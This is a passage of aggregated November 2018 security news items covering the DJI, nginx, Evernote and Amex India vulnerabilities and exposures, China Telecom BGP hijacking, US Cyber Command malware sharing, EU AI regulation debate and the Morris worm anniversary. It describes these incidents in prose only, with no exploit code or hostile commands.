A statement from DJI sent to SecurityWeek confirms the problem. "Check Point's researchers discovered that DJI's platforms used a token to identify registered users across different aspects of the customer experience, making it a target for potential hackers looking for ways to access accounts. DJI users who had manually uploaded photos, videos or flight logs to DJI's cloud servers could have seen that data become vulnerable to hacking. It could have also allowed access to some customer information, and users on the DJI FlightHub fleet management system could have had live flight information accessed as well."

DJI engineers subsequently classified the vulnerability as high risk, but low probability. The high risk is clear; but the low probability is explained as the necessity for "a complicated set of preconditions to be successfully exploited: The user would have to be logged into their DJI account while clicking on a specially-planted malicious link in the DJI Forum."

There is, adds the DJI statement, "no evidence it was ever exploited." It is worth noting, however, Check Point's closing comment: "the admin would not receive any notification that an attacker has accessed their account. Meanwhile, the attacker would have completely uninhibited access to login and view the drone's camera during live operations of any flights currently in progress, or download records of previously recorded flights that had been uploaded to the FlightHub platform."

Several Vulnerabilities Patched in nginx
9.11.2018 securityweek

Updates released this week for the nginx open source web server software address several denial-of-service (DoS) vulnerabilities.

In addition to providing web server functionality, Nginx can be used as a load balancer and a reverse proxy. It powers roughly 400 million websites, which makes it one of the most widely used web servers. NGINX, Inc., the company behind nginx, has raised over $100 million, including $43 million in June 2018.

Nginx developers announced this week that versions 1.15.6 and 1.14.1 address two HTTP/2 implementation vulnerabilities that can lead to a DoS condition. The issues impact versions 1.9.5 through 1.15.5.

One of the flaws, tracked as CVE-2018-16843, can result in excessive memory consumption. The other security bug, discovered by Gal Goldshtein from F5 Networks and identified as CVE-2018-16844, can cause excessive CPU usage.

“The issues affect nginx compiled with the ngx_http_v2_module (not compiled by default) if the ‘http2’ option of the ‘listen’ directive is used in a configuration file,” explained nginx core developer Maxim Dounin.

Website administrators using nginx were also informed of a security hole affecting the ngx_http_mp4_module module, which provides pseudo-streaming support for MP4 media files.

The vulnerability, tracked as CVE-2018-16845, can allow an attacker to cause the worker process to crash or leak memory by getting the module to process a specially crafted MP4 file.

“The issue only affects nginx if it is built with the ngx_http_mp4_module (the module is not built by default) and the ‘mp4’ directive is used in the configuration file,” Dounin explained. “Further, the attack is only possible if an attacker is able to trigger processing of a specially crafted mp4 file with the ngx_http_mp4_module.”

This vulnerability impacts nginx 1.1.3 and later and 1.0.7 and later, and it was also patched with the release of versions 1.15.6 and 1.14.1 on November 6.

689,272 plaintext records of Amex India customers exposed online
9.11.2018 securityaffairs Hacking 

Records associated with 689,272 plaintext records Amex India customers were exposed online via unsecured MongoDB server.
Personal details of nearly 700,000 American Express (Amex India) India customers were exposed online via an unsecured MongoDB server.

The huge trove of data was discovered by Bob Diachenko from cybersecurity firm Hacken, most of the records were encrypted, but 689,272 records were stored in plaintext.

The expert located the database by using IoT search engines such as Shodan and BinaryEdge.io.

“On 23rd October I discovered an unprotected Mongo DB which allowed millions of records to be viewed, edited and accessed by anybody who might have discovered this vulnerability. The records appeared to be from an American Express branch in India.” states the blog post published by Diachenko.

AMEX records american express

689,272 plaintext records included personal details of Amex India customers’ phone numbers, names, email addresses, and ‘type of card’ description fields.

The archive included 2,332,115 records containing encrypted data (i.e. names, addresses, Aadhaar numbers, PAN card numbers, and phone numbers.

Bob Diachenko
Seems like @AmexIndia exposed its #MongoDB for a while, with some really sensitive data (base64 encrypted). Now secured (just when I was preparing responsible disclosure), but question remains how long it was open. Found with @binaryedgeio engine.

10:12 AM - Oct 25, 2018
35 people are talking about this
Twitter Ads info and privacy
“Upon closer examination, I am inclined to believe that the database was not managed by AmEx itself but instead by one their subcontractors who were responsible for SEO or lead generation. I came to this conclusion since many of the entries contained fields such as ‘campaignID’, ‘prequalstatus’ and ‘leadID’ etc.” added Diachenko.

Diachenko promptly reported his findings to Amex India that immediately took down the server. At the time of writing is not clear how much time the server remained exposed online, Amex India that investigated the case declared that it did not discover any “evidence of unauthorized access.”

“We applaud AmEx’s rapid response to this issue, noting they immediately took down that server upon notification and began further investigations.” Diachenko concluded.

“As we learned from this incident, one never knows when transient firewall rules may inadvertently expose your development machines to the public. In this case, it appears to have only exposed some long-lost personal information of an unknown number of AmEx India customers, but for others, it could be critical intellectual property or even your entire subscriber base that is at risk of being exposed.”

Experts detailed how China Telecom used BGP hijacking to redirect traffic worldwide
9.11.2018 securityaffairs

Security researchers revealed in a recent paper that over the past years, China Telecom used BGP hijacking to misdirect Internet traffic through China.
Security researchers Chris C. Demchak and Yuval Shavitt revealed in a recent paper that over the past years, China Telecom has been misdirecting Internet traffic through China.

China Telecom was a brand of the state-owned China Telecommunications Corporation, but after marketization of the enterprise spin off the brand and operating companies as a separate group.

China Telecom is currently present in North American networks with 10 points-of-presence (PoPs) (eight in the United States and two in Canada), spanning major exchange points.

The two researchers pointed out that the telco company leverages the PoPs to hijack traffic through China, it has happened several times over the past years,

According to the experts, the activity went unnoticeable for a long time, but to better understand how it is possible to hijack the traffic let’s reads this excerpt from the paper:

“Within the BGP forwarding tables, administrators of each AS announce to their AS neighbors the IP address blocks that their AS owns, whether to be used as a destination or a convenient transit node.” states the paper.

“Errors can occur given the complexity of configuring BGP, and these possible errors offer covert actors a number of hijack opportunities. If network AS1 mistakenly announces through its BGP that it owns an IP block that actually is owned by network AS2, traffic from a portion of the Internet destined for AS2 will actually be routed to – and through – AS1. If the erroneous announcement was maliciously arranged, then a BGP hijack has occurred.”

On April 8th, 2010 China Telecom hijacked 15% of the Internet traffic for 18 minutes, experts speculate it was a large-scale experiment for controlling the traffic flows.

The incident also affected US government (‘‘.gov’’) and military (‘‘.mil’’) websites.

Many other similar cases were reported by the experts over the years, in December 2017, traffic for Google, Apple, Facebook, Microsoft, and other tech giants routed through Russia, also in this case experts speculated it was an intentional BGP Hijacking.

According to the research paper, China Telecom used numerous PoPs to hijack domestic US and crossUS traffic redirecting the flow to China over days, weeks, and months.

“The patterns of traffic revealed in traceroute research suggest repetitive IP hijack attacks committed by China Telecom.” continues the research.

“While one may argue such attacks can always be explained by ‘normal’ BGP behavior, these in particular suggest malicious intent, precisely because of their unusual transit characteristics –namely the lengthened routes and the abnormal durations,”

In February 2016, another attack hijacked traffic from Canada to Korean Government websites to China in what is defined as a perfect scenario of long-term cyber espionage.

“Starting from February 2016 and for about 6 months, routes from Canada to Korean government sites were hijacked by China Telecom and routed through China. Figure 2a shows the shortest and normal route: Canada-US-Korea.” continues the report.

“As shown in figure 2b, however, the hijacked route started at the China Telecom PoP in Toronto, the traffic was then forwarded inside the Chinese network to their PoP on the US West Coast, from there to China, and finally to delivery in Korea.”

China Telecom Traffic Hijacking

A similar attack occurred on October 2016, when traffic from several locations in the USA to a large Anglo-American bank headquarters in Milan, Italy was hijacked by China Telecom to China.

Another incident has happened on December 9, 2015, when traffic to Verizon APAC was hijacked through China Telecom. In response to the incident two of the major carriers of the affected routes implemented filters to refuse Verizon routes from China Telecom.

The security experts described many other BGP hijacking attacks involving China Telecom, further info is reported in the research paper.

Security experts are pushing to adopt solutions to protect BGP, Cloudflare for example, sustains that Resource Public Key Infrastructure (RPKI) could secure BGP routing.

U.S. Cyber Command Shares Malware via VirusTotal
8.11.2018 securityweek 

The U.S. Cyber Command (USCYBERCOM) this week started sharing malware samples with the cybersecurity industry via Chronicle’s VirusTotal intelligence service.

The project is run by USCYBERCOM’s Cyber National Mission Force (CNMF), which will post unclassified malware samples on the CYBERCOM_Malware_Alert account on VirusTotal.

“Recognizing the value of collaboration with the public sector, the CNMF has initiated an effort to share unclassified malware samples it has discovered that it believes will have the greatest impact on improving global cybersecurity,” USCYBERCOM stated.

CNMF claims that its goal is to “to help prevent harm by malicious cyber actors by sharing with the global cybersecurity community.”

Members of the cybersecurity industry can keep track of each new malware sample shared by CNMF through a dedicated Twitter account named USCYBERCOM Malware Alert (@CNMF_VirusAlert). The Twitter account currently has over 3,000 followers and the VirusTotal account is already trusted by more than 50 users.

The first malware samples shared by CNMF on VirusTotal are part of the Lojack (LoJax) family, which researchers observed recently in attacks apparently carried out by the Russia-linked cyber espionage group tracked as Sofacy, APT28, Fancy Bear, Pawn Storm, Sednit and Strontium.

The samples, contained in files named rpcnetp.exe and rpcnetp.dll, seem to be new and related to the UEFI rootkit analyzed by ESET after being used by the Russian threat actor to target government organizations in Central and Eastern Europe.

USCYBERCOM shares malware samples on VirusTotal

USCYBERCOM shares malware samples on VirusTotal

USCYBERCOM shares malware samples on VirusTotal

The Starter Pistol Has Been Fired for Artificial Intelligence Regulation in Europe
8.11.2018 securityweek 

Artificial Intelligence Regulation - It is needed?

Regulation of Artificial Intelligence Could Potentially be More Complex and Far Reaching Than GDPR

Paul Nemitz is principal advisor in the Directorate-General Justice and Consumers of the European Commission. It was Nemitz who transposed the underlying principles of data privacy into the legal text that ultimately became the European Union's General Data Protection Regulation (GDPR).

Now Nemitz has fired the starting gun for what may eventually become a European Regulation providing consumer safeguards against abuse from artificial intelligence (AI). In a new paper published in the Philosophical Transactions of the Royal Society, he warns that democracy itself is threatened by unbridled use of AI.

In the paper titled, 'Constitutional democracy and technology in the age of artificial intelligence', he warns that too much power, including AI research, is concentrated in the hands of what he calls the 'frightful five' (a term used by the New York Times in May 2017): Google, Apple, Facebook, Amazon and Microsoft, also known as GAFAM. His concern is that these and other tech companies have always argued that tech should be above the law because the law does not understand tech and cannot keep up with it.

Their argument, he suggests, is epitomized in Google's argument in the Court of Justice of the European Union (CJEU) disputing the applicability of EU law on data protection to its search engine, "basically claiming that the selection process of its search engine is beyond its control due to automation in the form of an algorithm."

The implication of this argument is that the working of AI should not be subject to national laws simply because the purveyors of AI don't understand how its decisions are reached. Nemitz believes this attitude undermines the very principles of democracy itself. While democracy and laws are concerned with the good of the people, big business is concerned almost exclusively with profit.

He gets some support from the UK's Information Commissioner Elizabeth Denham. In an unrelated blog published November 6, 2018 discussing the ICO's investigation into the Facebook/Cambridge Analytica issue, she writes, "We are at a crossroads. Trust and confidence in the integrity of our democratic processes risks being disrupted because the average person has little idea of what is going on behind the scenes."

"It is these powerful internet technology corporations which have already demonstrated that they cannot be trusted to pursue public interest on a grand scale without the hard hand of the law and its rigorous enforcement setting boundaries and even giving directions and orientation for innovation which are in the public interest," writes Nemitz. He continues, "In fact, some representatives of these corporations may have themselves recently come to this conclusion and called for legislation on AI."

Here he specifically refers to a Bloomberg article titled, 'Microsoft Says AI Advances Will Require New Laws, Regulations'. But what the article actually says is, "Over the next two years, Microsoft plans to codify the company's ethics and design rules to govern its AI work, using staff from [Brad] Smith's legal group and the AI group run by Executive Vice President Harry Shum. The development of laws will come a few years after that, Smith said."

In other words, Microsoft expects regulation to take account of what it decides to do in AI, not that AI needs regulation before Microsoft codifies what it wants to do. Again, this implies that big business believes -- and acts -- as if business is more important than government: that profit supersedes democracy.

Nemitz believes that this attitude towards early stage development of the internet has allowed the development of a lawless internet. "Avoiding the law or intentionally breaking it, telling half truth to legislators or trying to ridicule them, as we recently saw in the Cambridge Analytica hearings by Mark Zuckerberg of Facebook, became a sport on both sides of the Atlantic in which digital corporations, digital activists and digital engineers and programmers rubbed shoulders."

He does neither himself nor his argument any favors, however, in warning that the unregulated internet has evolved into a medium for populists to communicate their ideologies in a manner not suited to democratic discourse. "Trump ruling by Tweet is the best example for this." While he may be accurate in principle, this personalization opens his argument to the criticism of bias.

Nemitz believes that the long-standing attitude by big business towards privacy and the internet must not be allowed to embed itself into AI and the internet. The implication is that this can only be controlled by regulation, and that regulation must be imposed by law rather than reached by consensus among the tech companies.

Business is likely to disagree. The first argument will be that you simply cannot regulate something as nebulous as artificial intelligence, nor should you wish to.

"Is regulatory control necessary over the navigation algorithm in my Roomba vacuum cleaner?" asks Raj Minhas, VP and director of the PARC Interactions and Analytics Lab at PARC (a Xerox company). "Is regulatory control necessary over the algorithm in my camera that automatically determines the exposure settings? Market forces can easily take care of these and many other similar AI systems."

It should be noted, however, that Nemitz is not calling for the regulation of AI itself, but for regulation over the use of AI and its effect on consumers. Indeed, in this sense, the European Union already has some AI regulation within GDPR -- automatic data subject profiling is prohibited. So, if AI within a vacuum cleaner collects data on its user, or if AI in a camera collects information on user interests for either cleaning companies' or holiday companies' targeted advertising purposes, without consent, this is already illegal under GDPR.

So, it is the abuse of AI driven by big business' need for profit rather than AI itself that concerns him. GDPR does not attempt to regulate targeted advertising -- instead it seeks to regulate the abuse of personal privacy used in targeted advertising. Nemitz believes the same principle-based technology-neutral approach to regulating AI abuses, even though we do not yet know what these future abuses might be, should be the way forward.

His first principle is to remove the subjective elements of human illegality, such as 'intent' or 'negligence'. Then, "it will be important to codify in law the principle that an action carried out by AI is illegal if the same action carried out by a human, abstraction made of subjective elements, would be illegal."

But he believes the foundation for AI regulation could be required impact assessments. For government use of AI, theses assessments would need to be made public. They would underpin 'the public knowledge and understanding' of AI, which currently lacks 'transparency'. The standards for such assessments would need to be set in law. "And as in the GDPR, the compliance with the standards for the impact assessment would have to be controlled by public authorities and non compliance should be subject to sufficiently deterrent sanctions."

But perhaps the key requirement he proposes is that "the use of AI should have a right, to be introduced by law, to an explanation of how the AI functions, what logic it follows, and how its use affect the interests of the individual concerned, thus the individual impacts of the use of AI on a person, even if the AI does not process personal data."

In other words, the argument put forward by Google that it is not responsible for the automated decisions of its search algorithms should be rejected, and the same rejection applied to all algorithms within AI. This will force responsibility for the effect of AI onto the user of that AI, regardless of the outcome on the object.

Such ideas and proposals can be viewed as the starting gun for GDPR-style legislation for AI. Nemitz is not a European Commissioner, so this is not an official viewpoint. But he is senior adviser in the most relevant EC office. It would be unrealistic to think these views are unknown or contrary to current early thinking within the EC. The likelihood is that there will be some GDPR-like legislation in the future. It is many years off -- but the arguments start now.

One of the biggest problems is that it could be seen as a governing party issue. Whether Nemitz views it like this or not, it could be claimed that he is asserting the right of an unelected European Commission to rule over citizens who could directly impose their will against what they use by pure market forces without the interference of bureaucrats

It could also be claimed that it is more driven by politico-economic wishes than by altruism. The 'frightful five' are all non-EU companies (i.e. U.S. companies) dominating the market and suppressing EU companies by force of their success. In short, it could be claimed that AI regulation is driven by anti-American economic bias.

Such arguments are already being made. Raj Minhas, while accepting that some of the Nemitz arguments and conclusions are fair, thinks that overall Nemitz is being too simplistic. He points out that the paper makes no mention of the 'good' achieved by the internet. "Would even a small fraction of that have been realized if the development of the internet had been shackled?" he asked SecurityWeek.

"He portrays technology companies (e.g. Google, Apple, Facebook, Amazon, and Microsoft) as shady cabals that are working to undermine democracy. Of course, the reality is far more complex," he said. "The technologies produced by those companies has done more to spread democracy and individual agency than most governments. The fact that they make lots of money should not automatically be considered a nefarious activity."

These large corporations are described as monoliths that single-mindedly work to undermine democracy. "Again, the reality is far more complex. These companies face immense pressure from their own employees to act in transparent and ethical ways -- they push them to give up lucrative military/government contracts because they don't align with the values of those employees. The fact that all these companies have a code of ethics for AI research is an outcome of those values rather than a diabolical plot to usurp democracy (as alleged by the author)."

The implication is that regulation is best left to self-regulation by the companies and their employees. This is a view confirmed by Nathan Wenzler, senior director of cybersecurity at Moss Adams. He accepts that there will inevitably need to be some regulation to "at least define where liability will rest and allow businesses to make sound decisions around whether or not it's worth it to pursue the course." He cites the moral and ethical issues around driverless vehicles when AI might be forced to decide between who to injure most in an unavoidable collision situation.

But as to more general AI regulation, he suggests, "Government regulators aren't exactly known for responding quickly to changes in technology matters, and as rapidly as AI programs are moving into becoming integrated into nearly everything, we may quickly reach a point where it simply won't be possible to regulate it all effectively... In the meantime, the best course of action we have presently is for the businesses involved in developing AI-powered tools and services to make the ethical considerations an integral part of their business decisions. It may be the only way we see the advantages of this technology take flight, while avoiding the potentially devastating down sides."

Kenneth Sanford, analytics architect and U.S. lead at Dataiku takes a nuanced view. He separates the operation of AI from the environment in which it is made and deployed. AI itself cannot be regulated. "Algorithms such as deep neural networks and ensemble models create an infinite number of possible recommendations that can never be regulated.," he told SecurityWeek.

He doesn't think that AI-based decision-making is actually changing much. "We have had personalized suggestions and persuasive advertising for years derived from generalizations and business rules. The main difference today is that these rules are codified in more finely determined micro segments and are delivered in a more seamless fashion in a digital world. In short, the main difference between now and 20 years ago is that we are better at it."

Any scope for regulation, he suggests, lies in the environment of AI. "What data are collected and how these data are used are a more realistic target for guardrails on the industry," he suggests.

This, however, is already regulated by GDPR. The unsaid implication is that no further AI-specific regulation is necessary or possible. But if the EU politicians take up the call for AI regulation as put forward by Paul Nemitz -- and his influence should not be discounted -- then there will be AI regulation. That legislation will potentially be more complex and far reaching than GDPR. The bigger question is not whether it will happen, but to what extent will GAFAM be able to shape it to their own will.

China Telecom Constantly Misdirects Internet Traffic
8.11.2018 securityweek 

Over the past years, China Telecom has been constantly misdirecting Internet traffic through China, researchers say.

The telecommunication company, one of the largest in China, has had a presence in North American networks for nearly two decades, and currently has 10 points-of-presence (PoPs) in the region (eight in the United States and two in Canada), spanning major exchange points.

Courtesy of this presence, the company was able to hijack traffic through China several times in the past, Chris C. Demchak and Yuval Shavitt revealed in a recent paper (PDF). China Telecom’s PoPs in North America made the rerouting not only possible, but also unnoticeable for a long time, the researchers say.

Back in 2010, China Telecom hijacked 15% of the world’s Internet prefixes, which resulted in popular websites being rerouted through China for around 18 minutes. The incident impacted US government (‘‘.gov’’) and military (‘‘.mil’’) sites as well, the commission assigned to investigate the incident revealed (PDF).

For the past several years, the Internet service provider (ISP) has been engaging in various forms of traffic hijacking, in some cases for days, weeks, and months, Demchak and Shavitt claim.

“The patterns of traffic revealed in traceroute research suggest repetitive IP hijack attacks committed by China Telecom. While one may argue such attacks can always be explained by ‘normal’ BGP behavior, these in particular suggest malicious intent, precisely because of their unusual transit characteristics –namely the lengthened routes and the abnormal durations,” the researchers note.

Doug Madory, Director of Internet Analysis at Oracle, confirms the paper’s findings that the ISP has been engaged in traffic hijacking for a long time, but says the purpose of the action remains unclear. Oracle has gained deep visibility into Web traffic after the acquisition of web traffic management firm Dyn in 2016.

“China Telecom (whether intentionally or not) has misdirected internet traffic (including out of the United States) in recent years. I know because I expended a great deal of effort to stop it in 2017,” Madory says.

One of the observed incidents happened on December 9, 2015, when networks around the world who accepted the misconfigured routes inadvertently sent traffic to Verizon APAC through China Telecom.

After being alerted on the issue “over the course of several months last year,” two of the largest carriers of the affected routes implemented filters to no longer accept Verizon routes from China Telecom, which “reduced the footprint of these routes by 90%,” Madory notes.

Last year, he says, traffic was sent via mainland China even if it was supposed to travel only between peers in the United States. The issue repeated several times and resulted in a major US Internet infrastructure company deploying “filters on their peering sessions with China Telecom to block Verizon routes from being accepted.”

Referred to as BGP hijacking attacks (and also known as prefix or route hijacking), such incidents have become increasingly frequent over the past years, with a recent attack targeting payment processing companies in the US. According to Cloudflare, Resource Public Key Infrastructure (RPKI) could be the answer to securing BGP (Border Gateway Protocol) routing.

Evernote Flaw Allows Hackers to Steal Files, Execute Commands
8.11.2018 securityweek  Hacking 

A serious cross-site scripting (XSS) vulnerability discovered in the Evernote application for Windows can be exploited to steal files and execute arbitrary commands.

A researcher who uses the online moniker Sebao identified a stored XSS flaw in the Evernote app. He found that when a picture was added to a note and later renamed, JavaScript code could be added instead of a name. If the note was shared with another Evernote user, the code would get executed when the recipient clicked on the picture.

Evernote patched this security hole in September with the release of version 6.16. However,

TongQing Zhu of Knownsec 404 Team found that arbitrary code could still be injected into the name of an attached picture.

Unlike in the previous case, however, the code loads a Node.js file from a remote server. The script is executed via NodeWebKit, an application runtime that is used by Evernote in presentation mode.

For the attack to work, the attacker needs to convince the targeted user to open an Evernote note in presentation mode. If the exploit is successfully executed, the attacker can steal arbitrary files and execute commands.

TongQing Zhu showed how a hacker could exploit the vulnerability to read a Windows file and execute the Calculator application on the targeted system.

Evernote first patched the flaw, tracked as CVE-2018-18524, with the release of Evernote for Windows 6.16.1 beta in mid-October. The patch was rolled out to all users earlier this month with the release of Evernote 6.16.4.

TongQing Zhu has published a couple of videos showing how the vulnerability can be exploited:

BehavioSec Adds New Features to Behavioral Biometrics Platform
8.11.2018 securityweek 

The relationship between security and user friction remains problematic. Businesses can increase security by strengthening authentication procedures, for example, by requiring multi-factor authentication in the form of soft tokens or biometric proof of identity. But this invariably makes it more time-consuming and complex for the user. This complexity, usually known as user friction, deters online visitors and encourages in-house staff to seek ways to bypass it.

But there are two further problems with the traditional approach to user authentication. Firstly, it only confirms the user at log-in, and secondly, attackers are increasingly succeeding in their attempts to defeat traditional multi-factor authentication. If an attacker gets past the initial authentication, he is into the network as an authenticated user.

It is the circle of user friction and single point verification that the relatively new concept of continuous behavioral biometrics seeks to square. Behavioral biometrics differs from (but can include) traditional biometrics by defining 'how you behave' rather than 'who you are'. It doesn't do this just at the point of entry but continuously while the user is accessing the system. So, if attackers use stolen credentials and get through the log-in stage, they will still be detected by how they use the system.BehavioSec Adds New Features to Behavioral Biometrics Platform

Behavioral biometrics operates by building a user profile. It doesn't require any personal information from the user, nor does it require any additional process by the user. It measures aspects like keyboard, touch pad, touch screen habits: two-finger typing versus touch-typing; touch pad pressure; swipe directions; and so on. For in-house systems it includes geo-location of the user, normal access times, normal folder accesses etcetera.

The result is an accurate ongoing confirmation of the user. If the logged-in user doesn't conform to the behavioral habits of the user profile, he or she is flagged as a possible intruder. The result is that multi-factor initial authentication barriers can be lowered -- reducing user friction -- while overall security is raised.

San Francisco, Calif-based BehavioSec, founded in 2007 by Olov Renberg, pioneered this approach to authentication. It has now added new features to version 5.0 of its Behavioral Biometrics Platform announced Wednesday, November 7, 2018.

Some of the new features are new capabilities; others improve existing operation. New features include global profiling, detection of obfuscated origin, and Docker container support.

Global profiling now detects suspicious behavior by comparing the current user session to those in BehavioSec's entire protected population -- helping to detect new account fraud by users never previously seen by BehavioSec or the customer concerned.

This is strengthened by BehavioSec's new ability to detect obfuscated origins hidden by VPNs, Tor, and other proxy services. It flags bad actors on their first connection by matching suspect requests against a real-time feed of 1.5 billion compromised devices.

The new support for Docker containers makes it easier to deploy BehavioSec in many on-prem environments.

Enhanced features in version 5.0 include improved continuous touch support, new detection algorithms, and improved case management.

The improved continuous touch support makes mobile user authentication more efficient. By including gesture information, mobile fraud can be detected even where the traditional keyboard doesn't exist, and the on-screen keyboard has only limited use.

The new detection algorithms reduce the number of interactions required to profile and recognize users, and improve the recognition of remote access attempts by bots. Bots and remote access scripts typically operate against the system in a pattern completely different to a human user.

Improved case management automates the integration of fraud alerts with third-party case management systems. This helps the fraud analysts better manage the process of responding to the alerts generated by the BehavioSec rules engine.

"Our financial services, retail and other customers all have common digital transformation goals," commented BehavioSec VP of products, Jordan Blake; "they need to rapidly scale security in ways that drive customers' trust and improve the user experience across Web and mobile interfaces."

With the new Docker support, and enhanced detection and integration updates, he added, "we continue to turn the tables on fraud by making 'the human algorithm' the strongest link in security. By continuously authenticating users according to unique behavioral attributes -- instead of a password or text message someone can steal -- BehavioSec reinvents anti-fraud. Traditional password-driven security is increasingly known for performance limitations and needless friction."

BehavioSec has raised a total of $25.7 million dollars in venture funding. The most recent Series B funding announced in January 2018 raised $17.5 million. It was led by Trident Capital.

Microsoft Releases Guidance for Users Concerned About Flawed SSD Encryption
8.11.2018 securityweek 

After security researchers discovered vulnerabilities in the encryption mechanism of several types of solid-state drives (SSDs), Microsoft decided to explain how one can enforce software encryption instead.

In a paper published earlier this week, researchers from the Radboud University in the Netherlands revealed a series of bugs in self-encrypting SSDs from Samsung and Crucial that essentially nullify the full-disk encryption feature.

Furthermore, they also showed that the issues can even break software-based encryption. Specifically, they explained, Microsoft’s BitLocker would rely on hardware encryption when it detects the functionality, thus leaving data unprotected on Windows systems where the flawed SSDs are used.

On Tuesday, Microsoft published an advisory to provide information on how users can enforce software encryption on their Windows systems, given that, when a self-encrypting drive is present, BitLocker would use hardware encryption by default.

“Administrators who want to force software encryption on computers with self-encrypting drives can accomplish this by deploying a Group Policy to override the default behavior. Windows will consult Group Policy to enforce software encryption only at the time of enabling BitLocker,” Microsoft says.

Admins can check the type of drive encryption being used (hardware or software) by running ‘manage-bde.exe -status’ from an elevated command prompt. If there are drives encrypted using a vulnerable form of hardware encryption, they can be switched to software encryption via a Group Policy.

To make the switch from hardware encryption to software encryption, the drive would first need to be unencrypted and then re-encrypted using software encryption, the tech giant notes. The drive, however, does not require reformatting.

“If you are using BitLocker Drive Encryption, changing the Group Policy value to enforce software encryption alone is not sufficient to re-encrypt existing data,” Microsoft says.

After configuring and deploying a Group Policy to enable forced software encryption, admins should completely turn off BitLocker to decrypt the drive, and then simply re-enable it.

Google Wants More Projects Integrated With OSS-Fuzz
8.11.2018 securityweek 

Google this week revealed plans to reach out to critical open source projects and invite them to integrate with OSS-Fuzz.

Launched in December 2016, OSS-Fuzz is a free and continuous fuzzing infrastructure hosted on the Google Cloud Platform and designed to serve the Open Source Software (OSS) community through finding security vulnerabilities and stability issues.

OSS-Fuzz has already helped find and report over 9,000 flaws since launch, including bugs in critical projects such as FreeType2, FFmpeg, LibreOffice, SQLite, OpenSSL, and Wireshark.

Recently, Google has managed to consolidate the bug hunting and reporting processes into a single workflow, by unifying and automating its fuzzing tools, and believes that the OSS community should take advantage of this.

Thus, the Internet search giant has decided to contact the developers of critical projects and invite them to integrate with the fuzzing service.

“Projects integrated with OSS-Fuzz will benefit from being reviewed by both our internal and external fuzzing tools, thereby increasing code coverage and discovering bugs faster,” Google says.

Previously, the reporting process was a bit complex, as multiple tools were being used to identify bugs, while submissions were manually made to various public bug trackers, and then monitored until resolved.

“We are committed to helping open source projects benefit from integrating with our OSS-Fuzz fuzzing infrastructure. In the coming weeks, we will reach out via email to critical projects that we believe would be a good fit and support the community at large,” Google now says.

Projects that integrate are also eligible for rewards that range from $1,000 for initial integration to $20,000 for ideal integration. The rewards, Google says, should “offset the cost and effort required to properly configure fuzzing for OSS projects.”

Developers who would like to integrate their projects with OSS-Fuzz can submit them for review. Google wants to “admit as many OSS projects as possible and ensure that they are continuously fuzzed.” Contacted developers might be provided with a sample fuzz target for easy integration, the search company says.

30 Years Ago, the World's First Cyberattack Set the Stage for Modern Cybersecurity Challenges
8.11.2018 securityweek 

(THE CONVERSATION) - Back in November 1988, Robert Tappan Morris, son of the famous cryptographer Robert Morris Sr., was a 20-something graduate student at Cornell who wanted to know how big the internet was – that is, how many devices were connected to it. So he wrote a program that would travel from computer to computer and ask each machine to send a signal back to a control server, which would keep count.

The program worked well – too well, in fact. Morris had known that if it traveled too fast there might be problems, but the limits he built in weren’t enough to keep the program from clogging up large sections of the internet, both copying itself to new machines and sending those pings back. When he realized what was happening, even his messages warning system administrators about the problem couldn’t get through.

His program became the first of a particular type of cyber attack called “distributed denial of service,” in which large numbers of internet-connected devices, including computers, webcams and other smart gadgets, are told to send lots of traffic to one particular address, overloading it with so much activity that either the system shuts down or its network connections are completely blocked.

As the chair of the integrated Indiana University Cybersecurity Program, I can report that these kinds of attacks are increasingly frequent today. In many ways, Morris’s program, known to history as the “Morris worm,” set the stage for the crucial, and potentially devastating, vulnerabilities in what I and others have called the coming “Internet of Everything.”

Unpacking the Morris worm

Worms and viruses are similar, but different in one key way: A virus needs an external command, from a user or a hacker, to run its program. A worm, by contrast, hits the ground running all on its own. For example, even if you never open your email program, a worm that gets onto your computer might email a copy of itself to everyone in your address book.

In an era when few people were concerned about malicious software and nobody had protective software installed, the Morris worm spread quickly. It took 72 hours for researchers at Purdue and Berkeley to halt the worm. In that time, it infected tens of thousands of systems – about 10 percent of the computers then on the internet. Cleaning up the infection cost hundreds or thousands of dollars for each affected machine.

In the clamor of media attention about this first event of its kind, confusion was rampant. Some reporters even asked whether people could catch the computer infection. Sadly, many journalists as a whole haven’t gotten much more knowledgeable on the topic in the intervening decades.

Morris wasn’t trying to destroy the internet, but the worm’s widespread effects resulted in him being prosecuted under the then-new Computer Fraud and Abuse Act. He was sentenced to three years of probation and a roughly US$10,000 fine. In the late 1990s, though, he became a dot-com millionaire – and is now a professor at MIT.

Rising threats

The internet remains subject to much more frequent – and more crippling – DDoS attacks. With more than 20 billion devices of all types, from refrigerators and cars to fitness trackers, connected to the internet, and millions more being connected weekly, the number of security flaws and vulnerabilities is exploding.

In October 2016, a DDoS attack using thousands of hijacked webcams – often used for security or baby monitors – shut down access to a number of important internet services along the eastern U.S. seaboard. That event was the culmination of a series of increasingly damaging attacks using a botnet, or a network of compromised devices, which was controlled by software called Mirai. Today’s internet is much larger, but not much more secure, than the internet of 1988.

Some things have actually gotten worse. Figuring out who is behind particular attacks is not as easy as waiting for that person to get worried and send out apology notes and warnings, as Morris did in 1988. In some cases – the ones big enough to merit full investigations – it’s possible to identify the culprits. A trio of college students was ultimately found to have created Mirai to gain advantages when playing the “Minecraft” computer game.

Fighting DDoS attacks

But technological tools are not enough, and neither are laws and regulations about online activity – including the law under which Morris was charged. The dozens of state and federal cybercrime statutes on the books have not yet seemed to reduce the overall number or severity of attacks, in part because of the global nature of the problem.

There are some efforts underway in Congress to allow attack victims in some cases to engage in active defense measures – a notion that comes with a number of downsides, including the risk of escalation – and to require better security for internet-connected devices. But passage is far from assured.

There is cause for hope, though. In the wake of the Morris worm, Carnegie Mellon University established the world’s first Cyber Emergency Response Team, which has been replicated in the federal government and around the world. Some policymakers are talking about establishing a national cybersecurity safety board, to investigate digital weaknesses and issue recommendations, much as the National Transportation Safety Board does with airplane disasters.

More organizations are also taking preventative action, adopting best practices in cybersecurity as they build their systems, rather than waiting for a problem to happen and trying to clean up afterward. If more organizations considered cybersecurity as an important element of corporate social responsibility, they – and their staff, customers and business partners – would be safer.

In “3001: The Final Odyssey,” science fiction author Arthur C. Clarke envisioned a future where humanity sealed the worst of its weapons in a vault on the moon – which included room for the most malignant computer viruses ever created. Before the next iteration of the Morris worm or Mirai does untold damage to the modern information society, it is up to everyone – governments, companies and individuals alike – to set up rules and programs that support widespread cybersecurity, without waiting another 30 years.

U.S. Cyber Command CNMF Shares unclassified malware samples via VirusTotal
8.11.2018 securityaffairs

